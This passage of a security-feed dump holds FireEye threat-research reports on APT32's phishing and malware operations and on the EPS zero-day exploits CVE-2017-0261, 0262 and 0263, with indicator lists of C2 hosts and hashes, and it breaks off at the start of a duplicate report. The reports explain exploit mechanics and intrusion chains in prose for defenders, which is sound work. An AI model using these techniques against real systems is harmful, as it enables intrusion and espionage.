In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-06T23:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "modified": "2017-05-09T13:00:00", "published": "2017-05-09T13:00:00", "id": "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day 